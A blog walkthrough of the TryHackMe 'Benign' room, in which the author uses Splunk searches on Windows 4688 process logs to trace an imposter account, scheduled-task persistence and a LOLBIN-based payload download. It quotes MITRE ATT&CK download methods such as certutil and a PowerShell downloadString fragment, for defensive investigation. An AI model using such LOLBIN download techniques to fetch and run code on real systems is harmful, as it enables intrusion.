TryHackMe — Benign Challenge Room Walkthrough

An Endpoint Forensic Investigation using Splunk

Drew Arpino
9 min readSep 29, 2024
Image Credit: https://tryhackme.com/r/room/benign

Introduction:

Imagine this: You’re on the front lines of your organization’s security team when suddenly, intrusion detection alerts start firing from an endpoint, indicating discovery and persistence activity. You need to dive into your security logging platform, investigate the logs, and contain the threat. If this sounds like a thriller you want to be part of, you’ve stumbled upon the right blog!

Welcome to my weekly walkthrough! This week, we’re tackling the Benign room from TryHackMe. Using the Splunk data and logging platform, we’re going to investigate a compromised endpoint, but we only have the process execution logs (Event ID: 4688) ingested into the platform. Together, we’ll analyze the logs to find the compromised endpoint and then uncover how the malicious payload was downloaded onto the system, where it was hosted, and how it bypassed the security controls to get there. Sounds like fun, right? Let’s get to it!

In the spirit of learning, I won’t be revealing any flags in this write-up, but I hope that this guide sets you on the right track — you got this! If you find this walkthrough helpful in leveling up your skills or getting you through a tricky question, give it a clap! Your feedback helps me improve and continue supporting your security journey. Thanks for reading!

Challenge Link: https://tryhackme.com/r/room/benign

Challenge Scenario:

One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.

Question 1: How many logs are ingested from the month of March, 2022?

Let’s dive right in and start by getting an overview of how many logs have been ingested by Splunk in March 2022. First, we’ll open the Search & Reporting App from the left side of the dashboard:

Once inside of the Search tab, we’ll need to select the correct index that we want to query. Remember from the challenge scenario that the captured process execution logs were ingested into the win_event_log index.

Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.

So, to answer Question 1 we’ll need to find the total number of events ingested in March 2022. To do that we’ll first input the index name we want to search, then hit the date/time button to change the search range. Let’s select a Date Range between 03/01/2022 and 03/31/2022 and then press Apply.

This will show us the total number of events during the selected date range to answer Question 1.

Question 2: Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?

Okay, before diving into the logs again let’s pull back and review the information provided to us. We have a list of usernames and their corresponding departments which will be our point of comparison for “real” users versus “imposter” users.

About the Network Information

The network is divided into three logical segments. It will help in the investigation.

IT Department

James

Moin

Katrina

HR department

Haroon

Chris

Diana

Marketing department

Bell

Amelia

Deepak

Now that we have the correct index and date range selected already, let’s start to analyze the data.

To answer Question 2, we need to look at all the usernames captured within the ingested data. For that, we can leverage the stats command to display all the aggregated usernames from the UserName field.

win_event_log 
| stats count by UserName

This will show us all 11 of the UserNames in the data! After a comparison with the provided users list, we’ll find one that looks similar but not quite right…

Question 3: Which user from the HR department was observed to be running scheduled tasks?

Alright, to find the answer to Question 3 we’re going to search for evidence of persistence by looking for scheduled tasks activity within the HR department.

Since Splunk only has ingested logs for the process execution events we’ll need to use the name of the scheduled tasks executable in our search — schtasks.exe

win_event_log schtasks

This will return 87 scheduled task events, but we can speed up our analysis by looking at the usernames that appear in these events by selecting UserNames from the selected fields header.

This shows us four usernames appearing in the data set, so let’s just match the visible entries against the HR department list and see which user appears…

HR department

Haroon

Chris

Diana

Question 4: Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.

Okay! Now we’re going to dive deeper into our analysis and look for indicators of how the actor brought the payload/tools into the environment.

The first thing to do is narrow down our search scope and only view the logging data for the HR department users. Remember, we already have a list of all HR users from the previous question so all we need to do is format our query to include only those users:

win_event_log UserName=Daina OR UserName="Chris.fort" OR UserName="Haroon"

But even with the tighter search scope, we still have too many logs to go through manually.

Next, we need to drill down even further by searching for activity related to living off the land binaries (LOLBINS). For some background, LOLBINS are legitimate Microsoft-signed binaries that are native to Windows which could also be abused to perform some unintended activity by an adversary.

Fortunately, we don’t have to know these off the top of our heads and we can instead refer to the living off the land binaries and scripts (LOLBAS) repository on GitHub!

While the LOLBAS repository is a great start, we still need to find the exact tool within the list. Let’s work a little smarter and take a look at the MITRE ATT&CK knowledge base and see if we can find some specific tools in Windows that are used for Ingress Tool Transfer (MITRE ATT&CK T1105.)

According to the page for this technique:

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest.

Now if we cross-reference these utilities with the LOLBAS repository, we will find a couple of utilities to search for!

So, putting all of this together, we are going to use Splunk to search the win_event_log index containing known HR users, where the captured process command line (4688) matches one of the LOLBAS download methods that we validated with MITRE ATT&CK.

win_event_log UserName=Daina OR UserName="Chris.fort" OR UserName="Haroon" 
| search CommandLine="*NAME OF LOLBIN*"

And there we go — we found a hit in the logs! Look at the UserName field, this is the answer to Question 4. Keep this search result open as we are going to use it to answer the next few questions too.

Question 5: To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?

Fortunately, we already found the answer since the lolbin name was how we discovered the answer to Question 4.

Question 6: What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)

From the same event that we found in Question 4, enter the date from the Time column or the EventTime field from the event log — they are the same.

Question 7: Which third-party site was accessed to download the malicious payload?

In the CommandLine field, there is a visible URL in the command. The domain name is what we are looking for to answer Question 7.

Question 8: What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?

The file path the end of the C2 URL from the previous question points to an executable (.exe) file that is downloaded on the victim’s system.

Question 9: The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{……….}; what is that pattern?

Now that we have analyzed the suspicious event within Splunk, we need to start looking at the malicious content, but how do we do that? Well, the wording of this question is a bit confusing but since we do not have access to the suspicious binary within our ingested data, we’re going to pivot and gather some intelligence on the C2 URL instead.

Let’s start out by checking the C2 URL against VirusTotal to see if we can gather any information about it.

While the detection looks clean, let’s navigate to the Details tab to get some extra information. Navigate to the HTML Info section and check out the Meta Tags — notice anything interesting?

Is that a flag we see?

Question 10: What is the URL that the infected host connected to?

Okay, we’ve reached the last question, and it’s a straightforward one. The URL that the infected host connected to is the same one we used to answer Question 9. Simply copy, paste, and submit the final flag!

Conclusion:

A big thank you to TryHackMe for another awesome hands-on challenge! By leveraging Splunk, we’ve successfully identified the affected HR user and uncovered how a Living off the Land (LOLBIN) binary was abused to bypass security controls and download the malicious payload. Our investigation revealed that the payload was hosted on a suspicious URL, which we traced back to a compromised website with some interesting metadata.

The Benign room is a great opportunity to go hands-on with Splunk, exercise your research skills, and get familiar with the LOLBAS repository. As a defender, understanding how legitimate binaries are abused can help enrich your investigations and uncover the whole attack story. Personally, I find every opportunity to practice log analysis in a logging or SIEM platform helpful to keep my skills sharp and get the repetitions in with the tool. With the analysis of the logs completed, let’s wrap up this investigation!

Remember, if you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!

Until next week’s challenge — stay curious and be safe out there!

Tools & References:

Splunk (Stats): https://docs.splunk.com/Documentation/Splunk/9.3.1/SearchReference/Stats

Microsoft Learn (schtasks.exe): https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks

MITRE ATT&CK — Ingress Tool Transfer — T1105: https://attack.mitre.org/techniques/T1105/

Microsoft Learn (Certutil): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

VirusTotal: https://www.virustotal.com/gui/url/ec89f7db79c0760ecd6676a32feb5b0362526cbd491302ff3ad7bb0b640d21ce/details

--

--